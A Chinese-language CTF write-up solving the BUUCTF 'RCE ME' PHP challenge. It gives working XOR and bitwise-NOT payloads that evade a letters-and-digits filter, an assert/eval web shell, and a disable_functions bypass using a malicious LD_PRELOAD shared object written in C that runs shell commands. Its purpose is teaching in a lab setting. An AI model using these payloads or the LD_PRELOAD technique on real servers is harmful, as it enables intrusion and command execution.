BUUCTF:[极客大挑战 2019]RCE ME ——两种方法

BUUCTF:[极客大挑战 2019]RCE ME ——两种方法

BUUCTF:[极客大挑战 2019]RCE ME

打开环境是 代码审计题

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}
// ?>

代码审计很简单
我们上传的payload中不能含有大小写字母和数字
我们可以使用 异或绕过 和url编码取反绕过绕过

具体可以参考文章:PHP代码执行中出现过滤限制的绕过执行方法

在本关,我们要先访问 phpinfo 来查找被禁用的函数,从而进一步来构造我们的payload
.

查询禁用函数

异或和url取反在任意php版本下均可使用,所以两种方法均可使用。
url编码取反绕过
url编码取反绕过 :就是我们将php代码url编码后取反,我们传入参数后服务端进行url解码,这时由于取反后,会url解码成不可打印字符,这样我们就会绕过。

即,对查询语句取反,然后编码。在编码前加上~进行取反,括号没有被过滤,不用取反。构造完的语句进行查询:

?code=(~%8F%97%8F%96%91%99%90)();

异或饶过
异或:将两个字符的ascii转化为二进制 进行异或取值 从而得到新的二进制 转化为新的字符
eg:

字符:? ASCII码:63 二进制: 00‭11 1111‬
字符:~ ASCII码:126 二进制: 0111 1110‬
异或规则:
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
1 XOR 1 = 0
上述两个字符异或得到 二进制: 0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A

paylaod

?code=(%22%80%80%80%80%80%80%80%22%22%f0%e8%f0%e9%ee%e6%ef%22)();

在这里插入图片描述

disable_functions禁用函数过多
.

构造脚本

<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[test]))';
$d=urlencode(~$c);
echo $d;
 ?>

我们先使用上面的php脚本获取url编码取反

在这里插入图片描述

然后拼接为 assert(eval($_POST[test]))

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);

在这里,我们不能直接使用eval 因为 eval并不是php函数 所以为我们无法通过变量函数的方法进行调用。
在这里,我们使用 assert 来构造,但由于php版本问题,我们并不能直接构造<?php assert($_POST['a']);>,我们需要调用eval
拼接为 assert(eval($_POST[test]))

assert 可以将整个字符串参数当作php参数执行,但在 php7版本中

assert ( mixed $assertion [, Throwable $exception ] ) : bool

写不下去了…
有没有大佬解释下 感觉主要还是因为Throwable $exception不知道对不对…

在这里插入图片描述

用蚁剑连接
在这里插入图片描述

由于 disable_functions的存在我们不能说直接读取flag,需要借助readflag来读取

获取flag

在获取flag的时候我们也有两种方法 一种直接借助蚁剑中的插件进行绕过,一种是

借助蚁剑插件

在这里插入图片描述

/readflag
在这里插入图片描述

利用动态链接库—— LD_PRELOAD

因为 LD_PRELOAD允许我们在执行程序之前优先加载动态链接库。利用这个,我们就可以使用自己的函数,同时我们也可以向别人的程序注入恶意程序,从而达到我们的目的。

我们需要让我们编写的恶意elf文件优先启动我们书写的so文件访问即可获得flag

详细内容需要请关注这篇文章

突破思路

  1. 创建新进程
  2. 用c编写我们的恶意代码,将其转化为 so文件
  3. 让我们的 so文件为LD_PRELOAD
  4. 让我们的 so文件优先加载
  5. 运行主体 php函数

做题步骤:
编写hack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
	system("cat /flag >> /var/tmp/test.php");
	system("tac /flag >> /var/tmp/test.php");
	system("more /flag >> /var/tmp/test.php");
	system("head -2 /flag >> /var/tmp/test.php");
	system("tail /flag >> /var/tmp/test.php");
	system("/readflag >> /var/tmp/test.php");
}   
int  geteuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
}

getenv:获取环境变量的值

unsetenv:用来删除一个环境变量

system:定的命令名称或程序名称传给要被命令处理器执行的主机环境

payload 函数大概是说 查询 flag 并将flag返回到/var/tmp/文件夹下,flag返回形式为 test.php。
使用linux将我们的 .c 变为 so

gcc -shared -fPIC hack.c -o getflag.so

在这里插入图片描述

书写php文件

<?php
putenv("LD_PRELOAD=/var/tmp/getflag.so");
mail("","","","");
error_log("",1,"","");
?>

LD_PRELOAD=/var/tmp/getflag.so 意思是 LD_PRELOAD 是/var/tmp/文件夹下的 getflag.so 文件.

上传我们的 getflag.so 文件和 shell.php 文件

在这里插入图片描述

然后访问我们php文件即可(异或)

?code=${%fe%fe%fe%fe%a1%b9%bb%aa}[_](${%fe%fe%fe%fe%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/shell.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/getflag.so

之后到 var/tmp/文件下寻找test.php文件即可

在这里插入图片描述

在这里插入图片描述

                       

点击阅读全文

上一篇 2023年 5月 28日 am10:32
下一篇 2023年 5月 28日 am10:34